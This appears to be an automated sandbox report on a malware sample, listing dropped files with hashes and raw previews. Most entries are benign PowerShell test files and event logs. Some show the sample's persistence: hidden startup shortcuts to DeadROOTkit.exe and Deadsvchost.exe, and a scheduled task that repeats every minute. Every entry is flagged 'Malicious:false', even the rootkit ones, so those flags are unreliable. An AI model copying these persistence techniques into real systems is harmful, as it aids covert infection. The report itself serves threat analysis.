                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5tuieky.nv0.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r31zhdrs.qi5.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wf0oqb1l.1ll.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfhoexuy.5vr.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadROOTkit.lnk

                                                      Download File
                                                      Process:C:\Users\Public\DeadROOTkit.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:15:44 2024, mtime=Sun Oct 13 16:15:47 2024, atime=Sun Oct 13 16:15:47 2024, length=43520, window=hide
                                                      Category:dropped
                                                      Size (bytes):981
                                                      Entropy (8bit):5.062291866025137
                                                      Encrypted:false
                                                      SSDEEP:24:83/HM62jXRcA5cAvDf2S/7tlpcG9qyFm:806gXRPb2S/RlWG0yF
                                                      MD5:DBCF2154DB50EA11951CA7A7224617B2
                                                      SHA1:79D9AC8C2DA5F62330278F2BF25B32CFB6A982C6
                                                      SHA-256:4EDE7135774108017AD069FBFFC67C6BEF1075BBD5B31500CF6A3AEEC1CB3000
                                                      SHA-512:594C45C132E526ABA6A5819C2BC816354E71FF8A5FB41FB04347537C0CB48400639412B6E475B7A93C296402108C8AB73AE60802B2E3C0C6DB299C2515E7A0EC
                                                      Malicious:false
                                                      Preview:L..................F.... ....B......n.......n..............................z.:..DG..Yr?.D..U..k0.&...&......vk.v.....-.h......0.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^MY............................%..A.p.p.D.a.t.a...B.P.1.....MY...Local.<......CW.^MY.....b......................n..L.o.c.a.l.....l.2.....MY.. .DEADRO~1.EXE..P......MY..MY............................'...D.e.a.d.R.O.O.T.k.i.t...e.x.e.......[...............-.......Z............[b......C:\Users\user\AppData\Local\DeadROOTkit.exe..'.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.D.e.a.d.R.O.O.T.k.i.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......701188...........hT..CrF.f4... .M.5......,.......hT..CrF.f4... .M.5......,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk

                                                      Download File
                                                      Process:C:\Users\Public\DeadXClient.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:15:03 2024, mtime=Sun Oct 13 16:15:03 2024, atime=Sun Oct 13 16:15:03 2024, length=35840, window=hide
                                                      Category:dropped
                                                      Size (bytes):1003
                                                      Entropy (8bit):4.639017043994561
                                                      Encrypted:false
                                                      SSDEEP:12:8rTcFUlGInwlCICHqXYU2cXnYACmGlM8fCjA47z9KbgkNv9UNlpuPP44t2YZ/ele:8rTpGwwj2uh4GAUzqnvClpvqyFm
                                                      MD5:7D68C6F297EF63FB96BBBA668BB4D92E
                                                      SHA1:BB25DD90E88C5D0028D19930946C36FC28F6755C
                                                      SHA-256:C1DC6B98B4877962FBD84ECF8697CF9672D1D604B9A4C111DEE9D04A0AE84F6D
                                                      SHA-512:C7D38E1898692854FDB23C1DFCB9EEB98E21279277FB4F7734D2DE2E12E787369E402E2528E24A62D2CF07B6FED5A032FB4460E864888399DE3DCBA1CC717592
                                                      Malicious:false
                                                      Preview:L..................F.... ....*0q.....*0q.....*0q.................................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwHMY.....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....MY....Public..f......O.IMY......+...............<......4..P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....l.2.....MY. .DEADSV~1.EXE..P......MY.MY.....S......................q\.D.e.a.d.s.v.c.h.o.s.t...e.x.e.......N...............-.......M............[b......C:\Users\Public\Deadsvchost.exe........\.....\.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.D.e.a.d.s.v.c.h.o.s.t...e.x.e.............!............v..*.cM.jVD.Es.!...`.......X.......701188...........hT..CrF.f4... .V.T..b...,.......hT..CrF.f4... .V.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?.............

                                                      C:\Windows\System32\Tasks\DeadROOTkit

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):3550
                                                      Entropy (8bit):3.5749688822545456
                                                      Encrypted:false
                                                      SSDEEP:96:tXv9BdRi/enBnknNGki3igVA9ll7dhFFG+:/BdRtyNw3UrhG+
                                                      MD5:A7AD8290A05E8C5BAB44070E8C49A928
                                                      SHA1:2A841FA3D47E34CA42B095BE64C157C675F04BC4
                                                      SHA-256:D5A29ED08532604047CD965D09723224CCFE573D5F7B6720C23901077C2D411D
                                                      SHA-512:3C328EF9FFC52370AB605B4045802AC4343E5DEA222C2ECFE4D6C8F5BFD191C17F0A3189646D32D6E970DAB5DAC5435AEFF8818B11E8AFE727BF9C0A0E9441AE
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.1.3.T.1.3.:.1.5.:.4.4.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.D.e.a.d.R.O.O.T.k.i.t.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.1.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.4.-.1.0.-.1.3.T.1.3.:.1.5.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . .

                                                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:NlllulLlXz:NllULl
                                                      MD5:F1DA3E61F1111440976EF4E0EF5A21E8
                                                      SHA1:AF82A4E680D288104C62434B40CDCA694AED53C5
                                                      SHA-256:359E0FDD777C8B0197303900DC7BC59C771D54A05D2092B85FFCC18BD2D328F1
                                                      SHA-512:A9A79A49BEC4E704BB6D712FB623BB9887996BBA057B8845EA6B86D9C76B8AEF37C07A63093ECB04B9E92E0DAF5C0DEE4D6766B8B81F0BFF7B2E6728647394A3
                                                      Malicious:false
                                                      Preview:@...e................................................@..........

                                                      C:\Windows\System32\winevt\Logs\Application.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):3376
                                                      Entropy (8bit):3.9245987954757338
                                                      Encrypted:false
                                                      SSDEEP:48:M+MLrP+sXCrPwfFRVEfWb3/OoNMOyTL3W75HSqdrSDFDSLHg:cpCrup/vOo+9LGxjoFeA
                                                      MD5:5D7BECAD418E6B30CEFE4E79522E6E62
                                                      SHA1:97657FCF3ED326587D1E37C236B20B293D116860
                                                      SHA-256:CE6DC11D93200FA5B70484C4C3C5E187869DEFBFD2CB8726D9F80EA4735BADEA
                                                      SHA-512:334FA1DA3D5051C1106E4C5F03E31944907F40C6A2A8C19CFD1F4C6E3893C4DB0A703F45FFB6D5A47811F497943F3FA5997737FDB5FD4DC5008370D933B752C4
                                                      Malicious:false
                                                      Preview:ElfChnk.................r.......s...........X...0.....`.....................................................................d..............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...................................................................&...............................................~...**..X...r........+v............D.&.........D..T.Xb.L............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 304, DIRTY
                                                      Category:dropped
                                                      Size (bytes):109960
                                                      Entropy (8bit):3.644728544853286
                                                      Encrypted:false
                                                      SSDEEP:768:3VUHiapX7xadptrDT9W849YVUHiapX7xadptrDT9W849:WHi6xadptrX9WPxHi6xadptrX9WP
                                                      MD5:B489AAB6E2037C1AB4DD93EC672AE3C8
                                                      SHA1:09AE46126646B0A589DF7210E3B297E6AFBE0B3B
                                                      SHA-256:92FEB01281F5A9465BA81892BA5E390E1B3DBECC8A7CD92A3103D848CFBD3C93
                                                      SHA-512:4046C77F12F2A32F9DDAD9715E491CFCF269F2D1633721291439F807197A5B5423D17629F9B47FC565BFDDB58E68F818BC6AB0DAE1AAD1934E4A942AEE9CC47E
                                                      Malicious:false
                                                      Preview:ElfFile.................0...................................................................................................Fo.xElfChnk.........1...............1...........p.......oc.&.......................................................................E................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.010692427789071
                                                      Encrypted:false
                                                      SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                                      MD5:26C4C5213F3C6B727417EF07207AC1E0
                                                      SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                                      SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                                      SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                                      Malicious:false
                                                      Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):120752
                                                      Entropy (8bit):4.1819485767921085
                                                      Encrypted:false
                                                      SSDEEP:384:5VHVBhfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV8:zhfE3tXhfEh
                                                      MD5:F73371EB2FBEF228B1B9E939260B3EB4
                                                      SHA1:49D18096D0AB09E1DC94B3BB574627516785FA25
                                                      SHA-256:96C90F1FBE40E13D559F5AF476D1816981E0181E04AC9C7497C520C6DC1B9E82
                                                      SHA-512:20BB12181B6F6EE5E768E9DEEC8128DE3775B63A7E0113D7FF82085EA8E6D571F3DF2690E133D584E2D332F30B1599973CE31E44B6320D1A866B090F3B8E0E5E
                                                      Malicious:false
                                                      Preview:ElfChnk..............................................i.A....................................................................i...................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............9.t..............&...............................................................@.......X...a.!.....E..........@.9.t......&O......'O........P........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....O.p....**.................t............

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.428184470415061
                                                      Encrypted:false
                                                      SSDEEP:384:shTm5mcAmNQbmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:sQlD6CL49mVpgwQFQ
                                                      MD5:00E99687608BAFDD7004EC003DF19DFF
                                                      SHA1:4451F8FE517A8F67C283B53B19561758F113BA0C
                                                      SHA-256:A4F4A270B1805AC3B0BA32BD71495D287514104DD7484C07A5F11F8E3CD97115
                                                      SHA-512:0298E0F0ED2CC65DD59E630D441A96B6944A48D212439415DBC9FF775FBA8ED785D8DD6ABF2F88B3965B846C7C056BE67F621C479BB08CDD5A7BF83D582EEF86
                                                      Malicious:false
                                                      Preview:ElfChnk..!.......!.......!.......!..........................................................................................~f..................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 2, DIRTY
                                                      Category:dropped
                                                      Size (bytes):69448
                                                      Entropy (8bit):0.6208303949498422
                                                      Encrypted:false
                                                      SSDEEP:96:54NVaO8sMa3Z85ZML6rjjl3Z85ZuNNVaO8sMa3Z85ZML6rjjl3Z85Zu:5WV7pp8nMLivlp8nuV7pp8nMLivlp8n
                                                      MD5:03EACAFC39C0DC11A6E1446C8C652BF1
                                                      SHA1:2E0C673256693DF0E55D665972DDC63367EF9A32
                                                      SHA-256:D2008CBE7F2CABE702C1CE68A88A0A7D7479433EA7E5614BFA7349D259C0EE68
                                                      SHA-512:4919CC37C2BBE3CC015AC076BA428B2D50CA87934937922C274008F7A9593F92D98D4F5B2F725CD4A1780B48C1256C7B69F0F6008F192A80595ED6A2289589E9
                                                      Malicious:false
                                                      Preview:ElfFile.....................................................................................................................A..>ElfChnk.....................................p.......:.9....................................................................................................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.014860518194814
                                                      Encrypted:false
                                                      SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                                      MD5:4FB8E2CF8B3F20534836684947962DC2
                                                      SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                                      SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                                      SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                                      Malicious:false
                                                      Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.15655690871689
                                                      Encrypted:false
                                                      SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                                      MD5:2DE60575CB719BF51FAB8A63F696B052
                                                      SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                                      SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                                      SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                                      Malicious:false
                                                      Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):101120
                                                      Entropy (8bit):2.677115835550678
                                                      Encrypted:false
                                                      SSDEEP:384:qosKxoJkoaAXHoj+yHoe6oaywoBoayiozoayPoGoay9hdo69CcoTorNorWorbvov:810qDCYy10bDCYy10l
                                                      MD5:D66CB039C050ED066E47AB1771F661EF
                                                      SHA1:4C3898F46A5E0686C4575B20CD4AC6E50ED8561B
                                                      SHA-256:F879FDF384530F3B2549A0291CD5EDBC9C8D0A493A0E3B4BFAF6516E46781765
                                                      SHA-512:AD5FA223180C5BA5BC21F1515F3DDD186D53A8BD817F5672CCB1D1E1BFF32C6846705DFA3E74BEAA22B8C84660D5F7E4BDD4DF32368D28FEAC43CA762D11B53A
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................8J..pL....S....................................................................R..@................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**................f...............$..............................................................>.......V...X.!..e................f......&O......'O.................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8524226245257144
                                                      Encrypted:false
                                                      SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                                      MD5:B8E105CC52B7107E2757421373CBA144
                                                      SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                                      SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                                      SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                                      Malicious:false
                                                      Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8432997252442703
                                                      Encrypted:false
                                                      SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                                      MD5:39EE3557626C7F112A88A4DE12E904C1
                                                      SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                                                      SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                                                      SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                                      Malicious:false
